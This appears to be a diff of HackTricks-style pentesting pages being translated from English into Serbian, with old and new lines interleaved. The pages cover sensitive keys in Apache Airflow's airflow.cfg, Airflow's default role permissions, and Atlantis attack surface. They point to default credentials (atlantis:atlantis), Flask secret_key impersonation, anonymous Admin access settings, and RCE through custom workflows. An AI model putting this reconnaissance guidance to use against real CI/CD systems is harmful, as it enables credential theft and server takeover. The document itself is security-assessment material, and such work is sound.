**Apache Airflow** generiše **config fajl** na svim airflow mašinama pod nazivom **`airflow.cfg`** u home direktorijumu korisnika airflow. Ovaj config fajl sadrži informacije o konfiguraciji i **može sadržati zanimljive i osetljive informacije.**
**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
**Postoje dva načina da se pristupi ovom fajlu: kompromitovanjem neke airflow mašine ili pristupanjem web konzoli.**
Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
Napomena da **vrednosti unutar config fajla** **možda nisu one koje se koriste**, jer ih možete prepisati postavljanjem env varijabli kao što su `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
If you have **access to some machine inside the airflow env**, check the **environment**.
Ako imate pristup **config fajlu na web serveru**, možete proveriti **pravu aktivnu konfiguraciju** na istoj stranici na kojoj se prikazuje konfiguracija.\
Ako imate **pristup nekoj mašini unutar airflow okruženja**, proverite **okruženje**.
Some interesting values to check when reading the config file:
Neke zanimljive vrednosti za proveru prilikom čitanja config fajla:
### \[api]
- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API:
- `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
- `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
- `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
- `airflow.api.auth.backend.basic_auth`: For **basic authentication**
- `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
- `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
- You can also **create you own authentication** method with python.
- **`google_key_path`:** Path to the **GCP service account key**
- **`access_control_allow_headers`**: Ovo označava **dozvoljene** **zaglavlja** za **CORS**
- **`access_control_allow_methods`**: Ovo označava **dozvoljene metode** za **CORS**
- **`access_control_allow_origins`**: Ovo označava **dozvoljene izvore** za **CORS**
- **`auth_backend`**: [**Prema dokumentaciji**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) nekoliko opcija može biti na snazi za konfiguraciju ko može pristupiti API-ju:
- `airflow.api.auth.backend.deny_all`: **Podrazumevano niko** ne može pristupiti API-ju
- `airflow.api.auth.backend.default`: **Svi mogu** pristupiti bez autentifikacije
- `airflow.api.auth.backend.kerberos_auth`: Za konfiguraciju **kerberos autentifikacije**
- `airflow.api.auth.backend.basic_auth`: Za **basic autentifikaciju**
- `airflow.composer.api.backend.composer_auth`: Koristi autentifikaciju kompozitora (GCP) (iz [**ovde**](https://cloud.google.com/composer/docs/access-airflow-api)).
- `composer_auth_user_registration_role`: Ovo označava **ulogu** koju će **korisnik kompozitora** dobiti unutar **airflow** (**Op** podrazumevano).
- Takođe možete **napraviti svoju metodu autentifikacije** pomoću Pythona.
- **`google_key_path`:** Putanja do **GCP servisnog naloga**
### **\[atlas]**
- **`password`**: Atlas password
- **`username`**: Atlas username
- **`password`**: Atlas lozinka
- **`username`**: Atlas korisničko ime
### \[celery]
- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_)
- **`result_backend`**: Postgres url which may contain **credentials**.
- **`ssl_cacert`**: Path to the cacert
- **`ssl_cert`**: Path to the cert
- **`ssl_key`**: Path to the key
- **`flower_basic_auth`** : Akreditivi (_user1:password1,user2:password2_)
- **`result_backend`**: Postgres url koji može sadržati **akreditive**.
- **`ssl_cacert`**: Putanja do cacert
- **`ssl_cert`**: Putanja do certifikata
- **`ssl_key`**: Putanja do ključa
### \[core]
- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that dont contain the strings `DAG` and `airflow`.
- **`fernet_key`**: Key to store encrypted variables (symmetric)
- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
- **`security`**: What security module to use (for example kerberos)
- **`dag_discovery_safe_mode`**: Omogućeno podrazumevano. Kada se otkrivaju DAG-ovi, ignorišu se svi fajlovi koji ne sadrže stringove `DAG` i `airflow`.
- **`fernet_key`**: Ključ za čuvanje enkriptovanih varijabli (simetričan)
- **`hide_sensitive_var_conn_fields`**: Omogućeno podrazumevano, skriva osetljive informacije o konekcijama.
- **`security`**: Koji sigurnosni modul koristiti (na primer kerberos)
### \[dask]
- **`tls_ca`**: Path to ca
- **`tls_cert`**: Part to the cert
- **`tls_key`**: Part to the tls key
- **`tls_ca`**: Putanja do ca
- **`tls_cert`**: Putanja do certifikata
- **`tls_key`**: Putanja do tls ključa
### \[kerberos]
- **`ccache`**: Path to ccache file
- **`forwardable`**: Enabled by default
- **`ccache`**: Putanja do ccache fajla
- **`forwardable`**: Omogućeno podrazumevano
### \[logging]
- **`google_key_path`**: Path to GCP JSON creds.
- **`google_key_path`**: Putanja do GCP JSON akreditiva.
### \[secrets]
- **`backend`**: Full class name of secrets backend to enable
- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class.
- **`backend`**: Puno ime klase backend-a za tajne koje treba omogućiti
- **`backend_kwargs`**: Parametar backend_kwargs se učitava u rečnik i prosleđuje **init** klasi backend-a za tajne.
### \[smtp]
- **`smtp_password`**: SMTP password
- **`smtp_user`**: SMTP user
- **`smtp_password`**: SMTP lozinka
- **`smtp_user`**: SMTP korisnik
### \[webserver]
- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value
- **`cookie_secure`**: Set **secure flag** on the the session cookie
- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console**
- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker)
- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**)
- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert**
- **`web_server_ssl_key`**: **Path** to the **SSL** **Key**
- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible
- **`cookie_samesite`**: Podrazumevano je **Lax**, tako da je već najslabija moguća vrednost
- **`cookie_secure`**: Postavi **sigurnu oznaku** na sesijskom kolačiću
- **`expose_config`**: Podrazumevano je False, ako je true, **config** može biti **pročitan** iz web **konzole**
- **`expose_stacktrace`**: Podrazumevano je True, prikazaće **python tracebacks** (potencijalno korisno za napadača)
- **`secret_key`**: Ovo je **ključ koji koristi flask za potpisivanje kolačića** (ako imate ovo možete **imitirati bilo kog korisnika u Airflow-u**)
- **`web_server_ssl_cert`**: **Putanja** do **SSL** **certifikata**
- **`web_server_ssl_key`**: **Putanja** do **SSL** **ključa**
- **`x_frame_enabled`**: Podrazumevano je **True**, tako da podrazumevano clickjacking nije moguć
### Web Authentication
By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as
Podrazumevano **web autentifikacija** je specificirana u fajlu **`webserver_config.py`** i konfiguriše se kao
```bash
AUTH_TYPE = AUTH_DB
```
Which means that the **authentication is checked against the database**. However, other configurations are possible like
Što znači da se **autentifikacija proverava u odnosu na bazu podataka**. Međutim, druge konfiguracije su moguće kao
```bash
AUTH_TYPE = AUTH_OAUTH
```
Da se **autentifikacija prepusti uslugama trećih strana**.
To leave the **authentication to third party services**.
However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**:
Međutim, postoji i opcija da se **omogući pristup anonimnim korisnicima**, postavljanjem sledećeg parametra na **željenu ulogu**:
```bash
AUTH_ROLE_PUBLIC = 'Admin'
```
{{#include ../../banners/hacktricks-training.md}}

30
src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md
View File

@@ -4,44 +4,40 @@
## RBAC
(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow dolazi sa **setom uloga po defaultu**: **Admin**, **User**, **Op**, **Viewer**, i **Public**. **Samo `Admin`** korisnici mogu **konfigurisati/menjati dozvole za druge uloge**. Ali nije preporučljivo da `Admin` korisnici menjaju ove podrazumevane uloge na bilo koji način uklanjanjem ili dodavanjem dozvola tim ulogama.
- **`Admin`** users have all possible permissions.
- **`Public`** users (anonymous) dont have any permissions.
- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.**
- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file**
- **`Op`** users have `User` permissions plus additional op permissions.
- **`Admin`** korisnici imaju sve moguće dozvole.
- **`Public`** korisnici (anonimni) nemaju nikakve dozvole.
- **`Viewer`** korisnici imaju ograničene dozvole za pregled (samo čitanje). **Ne može videti konfiguraciju.**
- **`User`** korisnici imaju `Viewer` dozvole plus dodatne korisničke dozvole koje mu omogućavaju da malo upravlja DAG-ovima. On **može videti konfiguracioni fajl.**
- **`Op`** korisnici imaju `User` dozvole plus dodatne op dozvole.
Note that **admin** users can **create more roles** with more **granular permissions**.
Napomena: **admin** korisnici mogu **kreirati više uloga** sa više **granularnih dozvola**.
Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
Takođe, napomena da je jedina podrazumevana uloga sa **dozvolom da lista korisnike i uloge Admin, čak ni Op** to neće moći da uradi.
### Default Permissions
These are the default permissions per default role:
Ovo su podrazumevane dozvole po podrazumevanoj ulozi:
- **Admin**
\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs]
\[može brisati na Connections, može čitati na Connections, može uređivati na Connections, može kreirati na Connections, može čitati na DAGs, može uređivati na DAGs, može brisati na DAGs, može čitati na DAG Runs, može čitati na Task Instances, može uređivati na Task Instances, može brisati na DAG Runs, može kreirati na DAG Runs, može uređivati na DAG Runs, može čitati na Audit Logs, može čitati na ImportError, može brisati na Pools, može čitati na Pools, može uređivati na Pools, može kreirati na Pools, može čitati na Providers, može brisati na Variables, može čitati na Variables, može uređivati na Variables, može kreirati na Variables, može čitati na XComs, može čitati na DAG Code, može čitati na Configurations, može čitati na Plugins, može čitati na Roles, može čitati na Permissions, može brisati na Roles, može uređivati na Roles, može kreirati na Roles, može čitati na Users, može kreirati na Users, može uređivati na Users, može brisati na Users, može čitati na DAG Dependencies, može čitati na Jobs, može čitati na My Password, može uređivati na My Password, može čitati na My Profile, može uređivati na My Profile, može čitati na SLA Misses, može čitati na Task Logs, može čitati na Website, pristup meniju na Browse, pristup meniju na DAG Dependencies, pristup meniju na DAG Runs, pristup meniju na Documentation, pristup meniju na Docs, pristup meniju na Jobs, pristup meniju na Audit Logs, pristup meniju na Plugins, pristup meniju na SLA Misses, pristup meniju na Task Instances, može kreirati na Task Instances, može brisati na Task Instances, pristup meniju na Admin, pristup meniju na Configurations, pristup meniju na Connections, pristup meniju na Pools, pristup meniju na Variables, pristup meniju na XComs, može brisati na XComs, može čitati na Task Reschedules, pristup meniju na Task Reschedules, može čitati na Triggers, pristup meniju na Triggers, može čitati na Passwords, može uređivati na Passwords, pristup meniju na List Users, pristup meniju na Security, pristup meniju na List Roles, može čitati na User Stats Chart, pristup meniju na User's Statistics, pristup meniju na Base Permissions, može čitati na View Menus, pristup meniju na Views/Menus, može čitati na Permission Views, pristup meniju na Permission on Views/Menus, može dobiti na MenuApi, pristup meniju na Providers, može kreirati na XComs]
- **Op**
\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs]
\[može brisati na Connections, može čitati na Connections, može uređivati na Connections, može kreirati na Connections, može čitati na DAGs, može uređivati na DAGs, može brisati na DAGs, može čitati na DAG Runs, može čitati na Task Instances, može uređivati na Task Instances, može brisati na DAG Runs, može kreirati na DAG Runs, može uređivati na DAG Runs, može čitati na Audit Logs, može čitati na ImportError, može brisati na Pools, može čitati na Pools, može uređivati na Pools, može kreirati na Pools, može čitati na Providers, može brisati na Variables, može čitati na Variables, može uređivati na Variables, može kreirati na Variables, može čitati na XComs, može čitati na DAG Code, može čitati na Configurations, može čitati na Plugins, može čitati na DAG Dependencies, može čitati na Jobs, može čitati na My Password, može uređivati na My Password, može čitati na My Profile, može uređivati na My Profile, može čitati na SLA Misses, može čitati na Task Logs, može čitati na Website, pristup meniju na Browse, pristup meniju na DAG Dependencies, pristup meniju na DAG Runs, pristup meniju na Documentation, pristup meniju na Docs, pristup meniju na Jobs, pristup meniju na Audit Logs, pristup meniju na Plugins, pristup meniju na SLA Misses, pristup meniju na Task Instances, može kreirati na Task Instances, može brisati na Task Instances, pristup meniju na Admin, pristup meniju na Configurations, pristup meniju na Connections, pristup meniju na Pools, pristup meniju na Variables, pristup meniju na XComs, može brisati na XComs]
- **User**
\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances]
\[može čitati na DAGs, može uređivati na DAGs, može brisati na DAGs, može čitati na DAG Runs, može čitati na Task Instances, može uređivati na Task Instances, može brisati na DAG Runs, može kreirati na DAG Runs, može uređivati na DAG Runs, može čitati na Audit Logs, može čitati na ImportError, može čitati na XComs, može čitati na DAG Code, može čitati na Plugins, može čitati na DAG Dependencies, može čitati na Jobs, može čitati na My Password, može uređivati na My Password, može čitati na My Profile, može uređivati na My Profile, može čitati na SLA Misses, može čitati na Task Logs, može čitati na Website, pristup meniju na Browse, pristup meniju na DAG Dependencies, pristup meniju na DAG Runs, pristup meniju na Documentation, pristup meniju na Docs, pristup meniju na Jobs, pristup meniju na Audit Logs, pristup meniju na Plugins, pristup meniju na SLA Misses, pristup meniju na Task Instances, može kreirati na Task Instances, može brisati na Task Instances]
- **Viewer**
\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances]
\[može čitati na DAGs, može čitati na DAG Runs, može čitati na Task Instances, može čitati na Audit Logs, može čitati na ImportError, može čitati na XComs, može čitati na DAG Code, može čitati na Plugins, može čitati na DAG Dependencies, može čitati na Jobs, može čitati na My Password, može uređivati na My Password, može čitati na My Profile, može uređivati na My Profile, može čitati na SLA Misses, može čitati na Task Logs, može čitati na Website, pristup meniju na Browse, pristup meniju na DAG Dependencies, pristup meniju na DAG Runs, pristup meniju na Documentation, pristup meniju na Docs, pristup meniju na Jobs, pristup meniju na Audit Logs, pristup meniju na Plugins, pristup meniju na SLA Misses, pristup meniju na Task Instances]
- **Public**
\[]
{{#include ../../banners/hacktricks-training.md}}

276
src/pentesting-ci-cd/atlantis-security.md
View File

@@ -4,109 +4,109 @@
### Basic Information
Atlantis basically helps you to to run terraform from Pull Requests from your git server.
Atlantis u suštini pomaže da pokrenete terraform iz Pull Requests sa vašeg git servera.
![](<../images/image (161).png>)
### Local Lab
1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
2. Create a **personal token** (with repo access) of your **github** user
3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
1. You can access the web page in 127.0.0.1:4141
1. Idite na **atlantis releases page** na [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) i **preuzmite** onaj koji vam odgovara.
2. Kreirajte **lični token** (sa pristupom repozitorijumu) vašeg **github** korisnika.
3. Izvršite `./atlantis testdrive` i to će kreirati **demo repo** koji možete koristiti da **komunicirate sa atlantisom**.
1. Možete pristupiti web stranici na 127.0.0.1:4141.
### Atlantis Access
#### Git Server Credentials
**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts.
**Atlantis** podržava nekoliko git hostova kao što su **Github**, **Gitlab**, **Bitbucket** i **Azure DevOps**.\
Međutim, da bi se pristupilo repozitorijumima na tim platformama i izvršavale akcije, potrebno je da se dodeli neki **privilegovan pristup** (barem prava za pisanje).\
[**Dokumentacija**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) preporučuje da se kreira korisnik na ovim platformama posebno za Atlantis, ali neki ljudi mogu koristiti lične naloge.
> [!WARNING]
> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
> U svakom slučaju, iz perspektive napadača, **Atlantis nalog** će biti veoma **interesantan** **za kompromitovanje**.
#### Webhooks
Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
Atlantis koristi opcionalno [**Webhook tajne**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) da bi potvrdio da su **webhookovi** koje prima sa vašeg Git hosta **legitimni**.
One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret.
Jedan način da to potvrdite bio bi da **dozvolite zahteve da dolaze samo sa IP adresa** vašeg Git hosta, ali lakši način je korišćenje Webhook Tajne.
Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet.
Napomena: osim ako ne koristite privatni github ili bitbucket server, moraćete da izložite webhook krajnje tačke internetu.
> [!WARNING]
> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
> Atlantis će **izlagati webhookove** kako bi git server mogao da mu šalje informacije. Iz perspektive napadača, bilo bi zanimljivo znati **da li možete slati poruke**.
#### Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>
[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html)
[Iz dokumentacije:](https://www.runatlantis.io/docs/provider-credentials.html)
Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
Atlantis pokreće Terraform jednostavno **izvršavajući `terraform plan` i `apply`** komande na serveru **na kojem je Atlantis hostovan**. Baš kao kada pokrećete Terraform lokalno, Atlantis treba kredencijale za vaš specifični provajder.
It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis:
Na vama je kako [obezbeđujete kredencijale](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) za vaš specifični provajder Atlantsu:
- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs.
- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex:
- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role")
- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running.
- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running.
- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials.
- Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) i [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) imaju svoje mehanizme za kredencijale provajdera. Pročitajte njihovu dokumentaciju.
- Ako pokrećete Atlantis u oblaku, mnogi oblaci imaju načine da daju pristup API-ju oblaka aplikacijama koje se na njima pokreću, npr:
- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Pretražite "EC2 Role")
- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference)
- Mnogi korisnici postavljaju promenljive okruženja, npr. `AWS_ACCESS_KEY`, gde se Atlantis pokreće.
- Drugi kreiraju potrebne konfiguracione datoteke, npr. `~/.aws/credentials`, gde se Atlantis pokreće.
- Koristite [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) da dobijete kredencijale provajdera.
> [!WARNING]
> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
> **Kontejner** u kojem **Atlantis** **radi** će verovatno **sadržati privilegovane kredencijale** za provajdere (AWS, GCP, Github...) koje Atlantis upravlja putem Terraforma.
#### Web Page
By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
Podrazumevano, Atlantis će pokrenuti **web stranicu na portu 4141 na localhostu**. Ova stranica samo omogućava da omogućite/isključite atlantis apply i proverite status plana repozitorijuma i otključate ih (ne dozvoljava da se stvari menjaju, tako da nije toliko korisna).
You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
Verovatno je nećete naći izloženu internetu, ali izgleda da podrazumevano **nema potrebnih kredencijala** za pristup (a ako ih ima, `atlantis`:`atlantis` su **podrazumevani**).
### Server Configuration
Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
Konfiguracija za `atlantis server` može se specificirati putem komandnih linijskih zastavica, promenljivih okruženja, konfiguracione datoteke ili kombinacije tri.
- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server
- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)
- Možete pronaći [**ovde listu zastavica**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) koje podržava Atlantis server.
- Možete pronaći [**ovde kako da transformišete opciju konfiguracije u env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables).
Values are **chosen in this order**:
Vrednosti se **biraju u ovom redosledu**:
1. Flags
2. Environment Variables
3. Config File
1. Zastavice
2. Promenljive okruženja
3. Konfiguraciona datoteka
> [!WARNING]
> Note that in the configuration you might find interesting values such as **tokens and passwords**.
> Napomena: u konfiguraciji možete pronaći zanimljive vrednosti kao što su **tokeni i lozinke**.
#### Repos Configuration
Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
Neke konfiguracije utiču na **kako se upravlja repozitorijumima**. Međutim, moguće je da **svaki repo zahteva različite postavke**, tako da postoje načini da se specificira svaki repo. Ovo je redosled prioriteta:
1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
3. **Default** values
1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) datoteka. Ova datoteka se može koristiti da specificira kako atlantis treba da tretira repo. Međutim, podrazumevano neke ključeve nije moguće specificirati ovde bez nekih zastavica koje to omogućavaju.
1. Verovatno je potrebno da bude dozvoljeno zastavicama kao što su `allowed_overrides` ili `allow_custom_workflows`.
2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): Možete je proslediti sa zastavicom `--repo-config` i to je yaml koji konfiguriše nove postavke za svaki repo (regexi su podržani).
3. **Podrazumevane** vrednosti.
**PR Protections**
Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
Atlantis omogućava da naznačite da li želite da **PR** bude **`odobren`** od strane nekog drugog (čak i ako to nije postavljeno u zaštiti grane) i/ili da bude **`spajivo`** (zaštite grane su prošle) **pre nego što se izvrši apply**. Sa stanovišta bezbednosti, preporučuje se postaviti obe opcije.
In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
U slučaju da je `allowed_overrides` True, ova podešavanja mogu biti **prepisana u svakom projektu putem datoteke `/atlantis.yml`**.
**Scripts**
The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.**
Konfiguracija repozitorijuma može **specificirati skripte** koje će se izvršiti [**pre**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) i [**posle**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) kada se **workflow izvrši.**
There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file.
Ne postoji opcija da se **specificiraju** ove skripte u **repo `/atlantis.yml`** datoteci.
**Workflow**
In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
U konfiguraciji repozitorijuma (server side config) možete [**specificirati novi podrazumevani workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), ili [**kreirati nove prilagođene workflow-e**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** Takođe možete **specificirati** koji **repozi** mogu **pristupiti** novim generisanim.\
Zatim, možete dozvoliti **atlantis.yaml** datoteci svakog repozitorijuma da **specificira workflow koji će se koristiti.**
> [!CAUTION]
> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\
> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
